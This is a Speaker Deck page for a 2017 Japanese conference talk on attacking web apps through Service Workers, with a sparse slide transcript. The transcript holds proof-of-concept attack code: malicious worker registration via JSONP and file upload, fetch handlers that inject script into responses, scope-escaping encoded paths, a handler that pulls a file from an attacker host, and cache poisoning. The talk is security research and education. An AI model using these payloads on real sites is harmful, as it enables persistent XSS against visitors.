Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
攻撃者視点で見る Service Worker / PWA Study SW
Search
Masato Kinugawa
September 14, 2017
Technology
20
26k
攻撃者視点で見る Service Worker / PWA Study SW
PWA Study(
https://web-study.connpass.com/event/65267/
) で発表した資料です。
Masato Kinugawa
September 14, 2017
Tweet
Share
More Decks by Masato Kinugawa
See All by Masato Kinugawa
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
masatokinugawa
8
3.1k
バグハンティングのすゝめ / P3NFEST
masatokinugawa
5
2k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
masatokinugawa
13
18k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
masatokinugawa
1
20k
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
21
6.7k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
96k
Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)
masatokinugawa
9
25k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
12k
5文字で書くJavaScript/ Shibuya.XSS techtalk #10
masatokinugawa
35
20k
Other Decks in Technology
See All in Technology
AWS Lambdaと歩んだ“サーバーレス”と今後 #lambda_10years
yoshidashingo
1
180
AGIについてChatGPTに聞いてみた
blueb
0
130
心が動くエンジニアリング ── 私が夢中になる理由
16bitidol
0
100
TypeScriptの次なる大進化なるか!? 条件型を返り値とする関数の型推論
uhyo
2
1.7k
iOS/Androidで同じUI体験をネ イティブで作成する際に気をつ けたい落とし穴
fumiyasac0921
1
110
プロダクト活用度で見えた真実 ホリゾンタルSaaSでの顧客解像度の高め方
tadaken3
0
180
Terraform Stacks入門 #HashiTalks
msato
0
360
RubyのWebアプリケーションを50倍速くする方法 / How to Make a Ruby Web Application 50 Times Faster
hogelog
3
950
100 名超が参加した日経グループ横断の競技型 AWS 学習イベント「Nikkei Group AWS GameDay」の紹介/mediajaws202411
nikkei_engineer_recruiting
1
170
OTelCol_TailSampling_and_SpanMetrics
gumamon
1
200
OS 標準のデザインシステムを超えて - より柔軟な Flutter テーマ管理 | FlutterKaigi 2024
ronnnnn
0
210
マルチモーダル / AI Agent / LLMOps 3つの技術トレンドで理解するLLMの今後の展望
hirosatogamo
37
12k
Featured
See All Featured
Optimising Largest Contentful Paint
csswizardry
33
2.9k
No one is an island. Learnings from fostering a developers community.
thoeni
19
3k
Making the Leap to Tech Lead
cromwellryan
133
8.9k
Making Projects Easy
brettharned
115
5.9k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
280
13k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
191
16k
Practical Orchestrator
shlominoach
186
10k
What's new in Ruby 2.0
geeforr
343
31k
How STYLIGHT went responsive
nonsquared
95
5.2k
Practical Tips for Bootstrapping Information Extraction Pipelines
honnibal
PRO
10
720
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
109
49k
Code Reviewing Like a Champion
maltzj
520
39k
Transcript
None
None
• •
• • • <script> navigator.serviceWorker.register("/sw.js") </script>
• • •
• • https://html5experts.jp/kyo_ago/5153/ https://speakerdeck.com/filedescriptor/exploiting-the-unexploitable-with-lesser-known-browser-tricks?slide=23
None
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...] alert(1)//({});
<script> navigator.serviceWorker.register("/jsonp?callback=[SW_HERE]//"); </script> HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...]
onfetch=event=>console.log('fetch')//({});
<script> var formData = new FormData(); formData.append("csrf_token", "secret"); var sw
= "/* [SW_CODE] */"; var blob = new Blob([sw], { type: "text/javascript"}); formData.append("file", blob, "sw.js"); fetch("/upload", {method: "POST", body: formData}) .then(/* Register SW */); </script>
• •
• • onfetch=e=>{ body = '<script>alert(1)</script>'; init = {headers: {'content-type':
'text/html'}}; e.respondWith(new Response(body,init)); }
• • • <script> navigator.serviceWorker.register("/sw.js", {scope: "/"}) </script>
• • "/assets/js/sw.js", {scope: "https://other.example.com/"} "/assets/js/sw.js", {scope: "/assets/"} "/assets/js/sw.js", {scope:
"/assets/css/"} "/assets/js/sw.js", {scope: "/assets/js/"} "/assets/js/sw.js", {scope: "/assets/js/sub/"}
HTTP/1.1 200 OK content-type: text/javascript service-worker-allowed: / [...]
https://example.com/api/jsonp https://example.com/api%2Fjsonp
❝ ❞
https://example.com/out-of-scope/ https://example.com/foo/..%2Fout-of-scope%2F
None
• • •
onfetch=e=>{ e.respondWith(fetch("//attacker/poc.swf")) } •
<?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="example.jp" /> </cross-domain-policy> https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2016
❝ ❞
<script src="//example.com/socialbutton.js"></script>
self.addEventListener('install', e => { e.registerForeignFetch({ scopes: ['/'], origins: ['*']// });
}); onforeignfetch = e => { e.respondWith(fetch(e.request).then(res => ({ response: new Response('alert(1)')// }))) }
• •
onfetch = event => { event.respondWith( caches.open("v1").then(function(cache) { return cache.match(event.request).then(function(response)
{ if (response) { return response;// } else { return fetch(event.request.clone()).then(function(response) { cache.put(event.request, response.clone());// return response; }); } }) }) ); };
<script> caches.open("v1").then(function(cache){ content = "<script>alert(1)</script>"; init = {headers: {"content-type": "text/html"}};
request = new Request("poison.html"); response = new Response(content, init); cache.put(request, response); }) </script>
<script> document.write(localStorage.getItem('name')); </script>
• • •
• • HTTP/1.1 200 OK Content-Type:text/html Clear-Site-Data: "storage"
GET https://example.com/sw.js HTTP/1.1 Host: example.com Connection: keep-alive Pragma: no-cache Cache-Control:
no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: */* Service-Worker: script Referer: https://example.com/ Accept-Encoding: gzip, deflate, br Accept-Language: ja,en;q=0.8,en-US;q=0.6
• •
None
None